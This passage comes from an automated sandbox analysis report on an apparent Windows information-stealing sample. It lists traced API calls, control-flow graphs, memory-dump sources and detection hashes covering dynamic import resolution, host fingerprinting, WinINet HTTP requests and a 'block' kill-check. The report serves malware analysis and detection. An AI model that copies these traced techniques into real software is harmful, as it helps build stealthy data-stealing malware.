                    • Associated: 00000000.00000002.1700682894.00000000006BA000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700814341.00000000006CE000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700814341.0000000000859000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700814341.0000000000937000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700814341.0000000000957000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700814341.0000000000961000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700814341.000000000096F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1701033572.0000000000970000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1701132073.0000000000B0F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1701145380.0000000000B10000.00000080.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                    • String ID: "$"$------$------$------
                    • API String ID: 460715078-2180234286
                    • Opcode ID: 63ee73a71b5f758b3ac8ffa0a6184976ae510e81df16d225440cbeb806c22ad6
                    • Instruction ID: 5a3fc47f830fac519a9ee9adc9cf6de0dab9a369f537e76f1d4ff80e5a9c74cb
                    • Opcode Fuzzy Hash: 63ee73a71b5f758b3ac8ffa0a6184976ae510e81df16d225440cbeb806c22ad6
                    • Instruction Fuzzy Hash: 8412FD71910118AAEB15FB91DC92FEEB339AF14304F50459FB10662091DFB82F99CB7A
                    APIs
                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004711B7), ref: 00487880
                    • RtlAllocateHeap.NTDLL(00000000), ref: 00487887
                    • GetUserNameA.ADVAPI32(00000104,00000104), ref: 0048789F
                    Memory Dump Source
                    • Source File: 00000000.00000002.1700682894.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.1700666613.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700682894.0000000000521000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700682894.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700682894.0000000000552000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700682894.00000000006BA000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700814341.00000000006CE000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700814341.0000000000859000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700814341.0000000000937000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700814341.0000000000957000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700814341.0000000000961000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700814341.000000000096F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1701033572.0000000000970000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1701132073.0000000000B0F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1701145380.0000000000B10000.00000080.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Heap$AllocateNameProcessUser
                    • String ID:
                    • API String ID: 1296208442-0
                    • Opcode ID: f5883007d09a8cfe8b3b1c7a53b851b7d3f667180ece71d9f8d60bffe1476838
                    • Instruction ID: 8ba8c793ab7cf6ab3ee7c00d29def371284b3271a8e5ef7d4347b829d8c40e9a
                    • Opcode Fuzzy Hash: f5883007d09a8cfe8b3b1c7a53b851b7d3f667180ece71d9f8d60bffe1476838
                    • Instruction Fuzzy Hash: D4F04FF1D44208ABC700DFD8DD49FAEBBB8EB04711F10065AFA05A2680C77855448BA2
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1700682894.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.1700666613.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700682894.0000000000521000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700682894.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700682894.0000000000552000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700682894.00000000006BA000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700814341.00000000006CE000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700814341.0000000000859000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700814341.0000000000937000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700814341.0000000000957000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700814341.0000000000961000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700814341.000000000096F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1701033572.0000000000970000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1701132073.0000000000B0F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1701145380.0000000000B10000.00000080.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: ExitInfoProcessSystem
                    • String ID:
                    • API String ID: 752954902-0
                    • Opcode ID: 1bcb3eeecc75703b25311057ad42369840053a71a9c91bfdad1cfaf8942cfbdb
                    • Instruction ID: ad3eddc768c8144dc9721f47ce6e612fc97f9ea57b03240fe03f72d4723a15a7
                    • Opcode Fuzzy Hash: 1bcb3eeecc75703b25311057ad42369840053a71a9c91bfdad1cfaf8942cfbdb
                    • Instruction Fuzzy Hash: B3D05EB890430CDBCB00DFE0D9496DDBB79FB0C321F0016A9D90562340EA3154C1CAA6

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 633 489c10-489c1a 634 489c20-48a031 GetProcAddress * 43 633->634 635 48a036-48a0ca LoadLibraryA * 8 633->635 634->635 636 48a0cc-48a141 GetProcAddress * 5 635->636 637 48a146-48a14d 635->637 636->637 638 48a153-48a211 GetProcAddress * 8 637->638 639 48a216-48a21d 637->639 638->639 640 48a298-48a29f 639->640 641 48a21f-48a293 GetProcAddress * 5 639->641 642 48a2a5-48a332 GetProcAddress * 6 640->642 643 48a337-48a33e 640->643 641->640 642->643 644 48a41f-48a426 643->644 645 48a344-48a41a GetProcAddress * 9 643->645 646 48a428-48a49d GetProcAddress * 5 644->646 647 48a4a2-48a4a9 644->647 645->644 646->647 648 48a4ab-48a4d7 GetProcAddress * 2 647->648 649 48a4dc-48a4e3 647->649 648->649 650 48a515-48a51c 649->650 651 48a4e5-48a510 GetProcAddress * 2 649->651 652 48a612-48a619 650->652 653 48a522-48a60d GetProcAddress * 10 650->653 651->650 654 48a61b-48a678 GetProcAddress * 4 652->654 655 48a67d-48a684 652->655 653->652 654->655 656 48a69e-48a6a5 655->656 657 48a686-48a699 GetProcAddress 655->657 658 48a708-48a709 656->658 659 48a6a7-48a703 GetProcAddress * 4 656->659 657->656 659->658
                    APIs
                    • GetProcAddress.KERNEL32(74DD0000,01225290), ref: 00489C2D
                    • GetProcAddress.KERNEL32(74DD0000,01225230), ref: 00489C45
                    • GetProcAddress.KERNEL32(74DD0000,012392F8), ref: 00489C5E
                    • GetProcAddress.KERNEL32(74DD0000,01239358), ref: 00489C76
                    • GetProcAddress.KERNEL32(74DD0000,01239418), ref: 00489C8E
                    • GetProcAddress.KERNEL32(74DD0000,01239400), ref: 00489CA7
                    • GetProcAddress.KERNEL32(74DD0000,0122BE58), ref: 00489CBF
                    • GetProcAddress.KERNEL32(74DD0000,0123CF10), ref: 00489CD7
                    • GetProcAddress.KERNEL32(74DD0000,0123CF58), ref: 00489CF0
                    • GetProcAddress.KERNEL32(74DD0000,0123D030), ref: 00489D08
                    • GetProcAddress.KERNEL32(74DD0000,0123D0A8), ref: 00489D20
                    • GetProcAddress.KERNEL32(74DD0000,01225250), ref: 00489D39
                    • GetProcAddress.KERNEL32(74DD0000,012252D0), ref: 00489D51
                    • GetProcAddress.KERNEL32(74DD0000,012253D0), ref: 00489D69
                    • GetProcAddress.KERNEL32(74DD0000,01225490), ref: 00489D82
                    • GetProcAddress.KERNEL32(74DD0000,0123CDF0), ref: 00489D9A
                    • GetProcAddress.KERNEL32(74DD0000,0123CF40), ref: 00489DB2
                    • GetProcAddress.KERNEL32(74DD0000,0122BC50), ref: 00489DCB
                    • GetProcAddress.KERNEL32(74DD0000,01225590), ref: 00489DE3
                    • GetProcAddress.KERNEL32(74DD0000,0123D018), ref: 00489DFB
                    • GetProcAddress.KERNEL32(74DD0000,0123CF88), ref: 00489E14
                    • GetProcAddress.KERNEL32(74DD0000,0123CE08), ref: 00489E2C
                    • GetProcAddress.KERNEL32(74DD0000,0123D048), ref: 00489E44
                    • GetProcAddress.KERNEL32(74DD0000,01225550), ref: 00489E5D
                    • GetProcAddress.KERNEL32(74DD0000,0123D060), ref: 00489E75
                    • GetProcAddress.KERNEL32(74DD0000,0123CFA0), ref: 00489E8D
                    • GetProcAddress.KERNEL32(74DD0000,0123CEE0), ref: 00489EA6
                    • GetProcAddress.KERNEL32(74DD0000,0123CFB8), ref: 00489EBE
                    • GetProcAddress.KERNEL32(74DD0000,0123CE98), ref: 00489ED6
                    • GetProcAddress.KERNEL32(74DD0000,0123D0C0), ref: 00489EEF
                    • GetProcAddress.KERNEL32(74DD0000,0123CFD0), ref: 00489F07
                    • GetProcAddress.KERNEL32(74DD0000,0123CFE8), ref: 00489F1F
                    • GetProcAddress.KERNEL32(74DD0000,0123CF70), ref: 00489F38
                    • GetProcAddress.KERNEL32(74DD0000,0123A220), ref: 00489F50
                    • GetProcAddress.KERNEL32(74DD0000,0123CEF8), ref: 00489F68
                    • GetProcAddress.KERNEL32(74DD0000,0123CF28), ref: 00489F81
                    • GetProcAddress.KERNEL32(74DD0000,012255F0), ref: 00489F99
                    • GetProcAddress.KERNEL32(74DD0000,0123D000), ref: 00489FB1
                    • GetProcAddress.KERNEL32(74DD0000,012252F0), ref: 00489FCA
                    • GetProcAddress.KERNEL32(74DD0000,0123D078), ref: 00489FE2
                    • GetProcAddress.KERNEL32(74DD0000,0123CDD8), ref: 00489FFA
                    • GetProcAddress.KERNEL32(74DD0000,01225310), ref: 0048A013
                    • GetProcAddress.KERNEL32(74DD0000,012257B0), ref: 0048A02B
                    • LoadLibraryA.KERNEL32(0123CE20,?,00485CA3,00490AEB,?,?,?,?,?,?,?,?,?,?,00490AEA,00490AE3), ref: 0048A03D
                    • LoadLibraryA.KERNEL32(0123D090,?,00485CA3,00490AEB,?,?,?,?,?,?,?,?,?,?,00490AEA,00490AE3), ref: 0048A04E
                    • LoadLibraryA.KERNEL32(0123CE38,?,00485CA3,00490AEB,?,?,?,?,?,?,?,?,?,?,00490AEA,00490AE3), ref: 0048A060
                    • LoadLibraryA.KERNEL32(0123CE50,?,00485CA3,00490AEB,?,?,?,?,?,?,?,?,?,?,00490AEA,00490AE3), ref: 0048A072
                    • LoadLibraryA.KERNEL32(0123CE68,?,00485CA3,00490AEB,?,?,?,?,?,?,?,?,?,?,00490AEA,00490AE3), ref: 0048A083
                    • LoadLibraryA.KERNEL32(0123CE80,?,00485CA3,00490AEB,?,?,?,?,?,?,?,?,?,?,00490AEA,00490AE3), ref: 0048A095
                    • LoadLibraryA.KERNEL32(0123CEB0,?,00485CA3,00490AEB,?,?,?,?,?,?,?,?,?,?,00490AEA,00490AE3), ref: 0048A0A7
                    • LoadLibraryA.KERNEL32(0123CEC8,?,00485CA3,00490AEB,?,?,?,?,?,?,?,?,?,?,00490AEA,00490AE3), ref: 0048A0B8
                    • GetProcAddress.KERNEL32(75290000,01225850), ref: 0048A0DA
                    • GetProcAddress.KERNEL32(75290000,0123D270), ref: 0048A0F2
                    • GetProcAddress.KERNEL32(75290000,012391A0), ref: 0048A10A
                    • GetProcAddress.KERNEL32(75290000,0123D2D0), ref: 0048A123
                    • GetProcAddress.KERNEL32(75290000,01225690), ref: 0048A13B
                    • GetProcAddress.KERNEL32(73440000,0122BC28), ref: 0048A160
                    • GetProcAddress.KERNEL32(73440000,01225890), ref: 0048A179
                    • GetProcAddress.KERNEL32(73440000,0122BB60), ref: 0048A191
                    • GetProcAddress.KERNEL32(73440000,0123D180), ref: 0048A1A9
                    • GetProcAddress.KERNEL32(73440000,0123D300), ref: 0048A1C2
                    • GetProcAddress.KERNEL32(73440000,01225910), ref: 0048A1DA
                    • GetProcAddress.KERNEL32(73440000,012258B0), ref: 0048A1F2
                    • GetProcAddress.KERNEL32(73440000,0123D198), ref: 0048A20B
                    • GetProcAddress.KERNEL32(752C0000,012256B0), ref: 0048A22C
                    • GetProcAddress.KERNEL32(752C0000,01225950), ref: 0048A244
                    • GetProcAddress.KERNEL32(752C0000,0123D1B0), ref: 0048A25D
                    • GetProcAddress.KERNEL32(752C0000,0123D1C8), ref: 0048A275
                    • GetProcAddress.KERNEL32(752C0000,01225990), ref: 0048A28D
                    • GetProcAddress.KERNEL32(74EC0000,0122B750), ref: 0048A2B3
                    • GetProcAddress.KERNEL32(74EC0000,0122B9F8), ref: 0048A2CB
                    • GetProcAddress.KERNEL32(74EC0000,0123D2B8), ref: 0048A2E3
                    • GetProcAddress.KERNEL32(74EC0000,01225630), ref: 0048A2FC
                    • GetProcAddress.KERNEL32(74EC0000,012258D0), ref: 0048A314
                    • GetProcAddress.KERNEL32(74EC0000,0122BA48), ref: 0048A32C
                    • GetProcAddress.KERNEL32(75BD0000,0123D150), ref: 0048A352
                    • GetProcAddress.KERNEL32(75BD0000,012256D0), ref: 0048A36A
                    • GetProcAddress.KERNEL32(75BD0000,01239110), ref: 0048A382
                    • GetProcAddress.KERNEL32(75BD0000,0123D138), ref: 0048A39B
                    • GetProcAddress.KERNEL32(75BD0000,0123D2A0), ref: 0048A3B3
                    • GetProcAddress.KERNEL32(75BD0000,01225870), ref: 0048A3CB
                    • GetProcAddress.KERNEL32(75BD0000,012256F0), ref: 0048A3E4
                    • GetProcAddress.KERNEL32(75BD0000,0123D1E0), ref: 0048A3FC
                    • GetProcAddress.KERNEL32(75BD0000,0123D2E8), ref: 0048A414
                    • GetProcAddress.KERNEL32(75A70000,01225750), ref: 0048A436
                    • GetProcAddress.KERNEL32(75A70000,0123D390), ref: 0048A44E
                    • GetProcAddress.KERNEL32(75A70000,0123D120), ref: 0048A466
                    • GetProcAddress.KERNEL32(75A70000,0123D318), ref: 0048A47F
                    • GetProcAddress.KERNEL32(75A70000,0123D1F8), ref: 0048A497
                    • GetProcAddress.KERNEL32(75450000,012258F0), ref: 0048A4B8
                    • GetProcAddress.KERNEL32(75450000,01225810), ref: 0048A4D1
                    • GetProcAddress.KERNEL32(75DA0000,01225610), ref: 0048A4F2
                    • GetProcAddress.KERNEL32(75DA0000,0123D288), ref: 0048A50A
                    • GetProcAddress.KERNEL32(6F070000,01225930), ref: 0048A530
                    • GetProcAddress.KERNEL32(6F070000,01225670), ref: 0048A548
                    • GetProcAddress.KERNEL32(6F070000,012257F0), ref: 0048A560
                    • GetProcAddress.KERNEL32(6F070000,0123D330), ref: 0048A579
                    • GetProcAddress.KERNEL32(6F070000,01225650), ref: 0048A591
                    • GetProcAddress.KERNEL32(6F070000,01225710), ref: 0048A5A9
                    • GetProcAddress.KERNEL32(6F070000,01225830), ref: 0048A5C2
                    • GetProcAddress.KERNEL32(6F070000,012259B0), ref: 0048A5DA
                    • GetProcAddress.KERNEL32(6F070000,InternetSetOptionA), ref: 0048A5F1
                    • GetProcAddress.KERNEL32(6F070000,HttpQueryInfoA), ref: 0048A607
                    • GetProcAddress.KERNEL32(75AF0000,0123D258), ref: 0048A629
                    • GetProcAddress.KERNEL32(75AF0000,012390E0), ref: 0048A641
                    • GetProcAddress.KERNEL32(75AF0000,0123D168), ref: 0048A659
                    • GetProcAddress.KERNEL32(75AF0000,0123D348), ref: 0048A672
                    • GetProcAddress.KERNEL32(75D90000,01225970), ref: 0048A693
                    • GetProcAddress.KERNEL32(6CFC0000,0123D360), ref: 0048A6B4
                    • GetProcAddress.KERNEL32(6CFC0000,01225730), ref: 0048A6CD
                    • GetProcAddress.KERNEL32(6CFC0000,0123D210), ref: 0048A6E5
                    • GetProcAddress.KERNEL32(6CFC0000,0123D378), ref: 0048A6FD
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1700682894.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.1700666613.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700682894.0000000000521000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700682894.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700682894.0000000000552000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700682894.00000000006BA000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700814341.00000000006CE000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700814341.0000000000859000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700814341.0000000000937000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700814341.0000000000957000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700814341.0000000000961000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700814341.000000000096F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1701033572.0000000000970000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1701132073.0000000000B0F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1701145380.0000000000B10000.00000080.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: AddressProc$LibraryLoad
                    • String ID: HttpQueryInfoA$InternetSetOptionA
                    • API String ID: 2238633743-1775429166
                    • Opcode ID: f928891eca37b3c6eba67e7bc3214ffe641fc22927121889b170b26223d3e169
                    • Instruction ID: c41d8b9c2eadc7a7bea7a4c45ce2d121fe360af5d7244156eebf2171d80eb049
                    • Opcode Fuzzy Hash: f928891eca37b3c6eba67e7bc3214ffe641fc22927121889b170b26223d3e169
                    • Instruction Fuzzy Hash: E0622FF9518200AFC354DFE8ED9899637FBF74C301714A72AE609C3664DA3A94C1DB52

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1033 476280-47630b call 48a7a0 call 4747b0 call 48a740 InternetOpenA StrCmpCA 1040 476314-476318 1033->1040 1041 47630d 1033->1041 1042 47631e-476342 InternetConnectA 1040->1042 1043 476509-476525 call 48a7a0 call 48a800 * 2 1040->1043 1041->1040 1044 4764ff-476503 InternetCloseHandle 1042->1044 1045 476348-47634c 1042->1045 1061 476528-47652d 1043->1061 1044->1043 1047 47634e-476358 1045->1047 1048 47635a 1045->1048 1051 476364-476392 HttpOpenRequestA 1047->1051 1048->1051 1053 4764f5-4764f9 InternetCloseHandle 1051->1053 1054 476398-47639c 1051->1054 1053->1044 1056 4763c5-476405 HttpSendRequestA HttpQueryInfoA 1054->1056 1057 47639e-4763bf InternetSetOptionA 1054->1057 1059 476407-476427 call 48a740 call 48a800 * 2 1056->1059 1060 47642c-47644b call 488940 1056->1060 1057->1056 1059->1061 1067 47644d-476454 1060->1067 1068 4764c9-4764e9 call 48a740 call 48a800 * 2 1060->1068 1071 4764c7-4764ef InternetCloseHandle 1067->1071 1072 476456-476480 InternetReadFile 1067->1072 1068->1061 1071->1053 1076 476482-476489 1072->1076 1077 47648b 1072->1077 1076->1077 1080 47648d-4764c5 call 48a9b0 call 48a8a0 call 48a800 1076->1080 1077->1071 1080->1072
                    APIs
                      • Part of subcall function 0048A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0048A7E6
                      • Part of subcall function 004747B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00474839
                      • Part of subcall function 004747B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00474849
                      • Part of subcall function 0048A740: lstrcpy.KERNEL32(00490E17,00000000), ref: 0048A788
                    • InternetOpenA.WININET(00490DFE,00000001,00000000,00000000,00000000), ref: 004762E1
                    • StrCmpCA.SHLWAPI(?,0123E858), ref: 00476303
                    • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00476335
                    • HttpOpenRequestA.WININET(00000000,GET,?,0123E298,00000000,00000000,00400100,00000000), ref: 00476385
                    • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 004763BF
                    • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 004763D1
                    • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 004763FD
                    • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0047646D
                    • InternetCloseHandle.WININET(00000000), ref: 004764EF
                    • InternetCloseHandle.WININET(00000000), ref: 004764F9
                    • InternetCloseHandle.WININET(00000000), ref: 00476503
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1700682894.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.1700666613.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700682894.0000000000521000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700682894.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700682894.0000000000552000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700682894.00000000006BA000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700814341.00000000006CE000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700814341.0000000000859000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700814341.0000000000937000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700814341.0000000000957000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700814341.0000000000961000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700814341.000000000096F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1701033572.0000000000970000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1701132073.0000000000B0F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1701145380.0000000000B10000.00000080.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                    • String ID: ERROR$ERROR$GET
                    • API String ID: 3749127164-2509457195
                    • Opcode ID: 06584afc0dc49f348e74a4b62c4e3e745179cae49cdf17aae885416e64e7c80a
                    • Instruction ID: 87f3cc9eafe6b2573de530db317f036a45e015956719af36f1e0df34e13874ff
                    • Opcode Fuzzy Hash: 06584afc0dc49f348e74a4b62c4e3e745179cae49cdf17aae885416e64e7c80a
                    • Instruction Fuzzy Hash: 6A715071A00218ABEF14EFE0DC45BEE7775BB44700F10859AF5096B190DBB86A85CF56

                    Control-flow Graph

                    APIs
                      • Part of subcall function 0048A820: lstrlen.KERNEL32(00474F05,?,?,00474F05,00490DDE), ref: 0048A82B
                      • Part of subcall function 0048A820: lstrcpy.KERNEL32(00490DDE,00000000), ref: 0048A885
                      • Part of subcall function 0048A740: lstrcpy.KERNEL32(00490E17,00000000), ref: 0048A788
                    • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00485644
                    • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 004856A1
                    • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00485857
                      • Part of subcall function 0048A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0048A7E6
                      • Part of subcall function 004851F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00485228
                      • Part of subcall function 0048A8A0: lstrcpy.KERNEL32(?,00490E17), ref: 0048A905
                      • Part of subcall function 004852C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00485318
                      • Part of subcall function 004852C0: lstrlen.KERNEL32(00000000), ref: 0048532F
                      • Part of subcall function 004852C0: StrStrA.SHLWAPI(00000000,00000000), ref: 00485364
                      • Part of subcall function 004852C0: lstrlen.KERNEL32(00000000), ref: 00485383
                      • Part of subcall function 004852C0: lstrlen.KERNEL32(00000000), ref: 004853AE
                    • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 0048578B
                    • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00485940
                    • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00485A0C
                    • Sleep.KERNEL32(0000EA60), ref: 00485A1B
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1700682894.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcpylstrlen$Sleep
                    • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                    • API String ID: 507064821-2791005934
                    • Opcode ID: 67aa3a3b624dbf14ae515dc4d2b672d086be53ad0efbeff52eb2fd66a249d702
                    • Instruction ID: 88efdae90fb068104a639411df46e0a71004b26558607818a40ace8b38b362b4
                    • Opcode Fuzzy Hash: 67aa3a3b624dbf14ae515dc4d2b672d086be53ad0efbeff52eb2fd66a249d702
                    • Instruction Fuzzy Hash: 06E18571910104AADB18FBB1DC96EED7339AF54304F50892FB40652091EF7C6F59CBAA

                    Control-flow Graph

                    APIs
                    • StrCmpCA.SHLWAPI(00000000,block), ref: 004817C5
                    • ExitProcess.KERNEL32 ref: 004817D1
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1700682894.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: ExitProcess
                    • String ID: block
                    • API String ID: 621844428-2199623458
                    • Opcode ID: 2fc22199fafc8295faec35d365acba4658ad14e8170cb9584163f8eee2184a8c
                    • Instruction ID: df69049100bd9a6e863445d6c97080ca260f61aa25535710b11ff65a0251ca8b
                    • Opcode Fuzzy Hash: 2fc22199fafc8295faec35d365acba4658ad14e8170cb9584163f8eee2184a8c
                    • Instruction Fuzzy Hash: A1519DB4A00209EFDB04EFA4D954BBE37B9BF04304F10595BE406A7360D778E952CB6A

                    Control-flow Graph

                    APIs
                    • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00487542
                    • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0048757F
                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00487603
                    • RtlAllocateHeap.NTDLL(00000000), ref: 0048760A
                    • wsprintfA.USER32 ref: 00487640
                      • Part of subcall function 0048A740: lstrcpy.KERNEL32(00490E17,00000000), ref: 0048A788
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1700682894.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                    • String ID: :$C$\$I
                    • API String ID: 1544550907-2636280491
                    • Opcode ID: 6746fbcdc5b2406351be08b1f3867355671c3909e746cccffe45cd4572b1668e
                    • Instruction ID: 0cd46ac30d74b8a1c1641622ec5f94c47e433e7a31435508609a27c424df082d
                    • Opcode Fuzzy Hash: 6746fbcdc5b2406351be08b1f3867355671c3909e746cccffe45cd4572b1668e
                    • Instruction Fuzzy Hash: 1F4194B1D04248ABDB10EF94DC55BDEBBB8EF08714F10459EF50967280D778AA84CBA5

                    Control-flow Graph

                    APIs
                      • Part of subcall function 00489860: GetProcAddress.KERNEL32(74DD0000,01232290), ref: 004898A1
                      • Part of subcall function 00489860: GetProcAddress.KERNEL32(74DD0000,01232188), ref: 004898BA
                      • Part of subcall function 00489860: GetProcAddress.KERNEL32(74DD0000,01232230), ref: 004898D2
                      • Part of subcall function 00489860: GetProcAddress.KERNEL32(74DD0000,012321B8), ref: 004898EA
                      • Part of subcall function 00489860: GetProcAddress.KERNEL32(74DD0000,012321E8), ref: 00489903
                      • Part of subcall function 00489860: GetProcAddress.KERNEL32(74DD0000,012391E0), ref: 0048991B
